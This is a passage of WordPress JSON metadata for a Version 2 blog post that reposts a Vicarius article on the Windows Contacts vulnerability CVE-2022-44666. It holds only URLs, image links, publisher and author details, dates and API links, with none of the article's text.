2","isPartOf":{"@id":"https:\/\/version-2.com\/zh\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max","datePublished":"2023-07-19T06:31:28+00:00","dateModified":"2023-08-07T07:56:21+00:00","breadcrumb":{"@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#breadcrumb"},"inLanguage":"zh-HK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day"]}]},{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage","url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max","contentUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max"},{"@type":"BreadcrumbList","@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/version-2.com\/zh\/"},{"@type":"ListItem","position":2,"name":"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)"}]},{"@type":"WebSite","@id":"https:\/\/version-2.com\/zh\/#website","url":"https:\/\/version-2.com\/zh\/","name":"Version 2","description":"","publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/version-2.com\/zh\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-HK"},{"@type":"Organization","@id":"https:\/\/version-2.com\/zh\/#organization","name":"Version 2","url":"https:\/\/version-2.com\/zh\/","logo":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","contentUrl":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","width":1795,"height":335,"caption":"Version 2"},"image":{"@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/011bc7c3731c930bcfeecd52fefb6365","name":"tracylamv2","image":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/secure.gravatar.com\/avatar\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g","caption":"tracylamv2"},"url":"https:\/\/version-2.com\/zh\/author\/tracylamv2\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbQRKm-hXN","post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/69055","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/users\/149011790"}],"replies":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/comments?post=69055"}],"version-history":[{"count":6,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/69055\/revisions"}],"predecessor-version":[{"id":69363,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/69055\/revisions\/69363"}],"wp:attachment":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/media?parent=69055"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/categories?post=69055"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/tags?post=69055"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}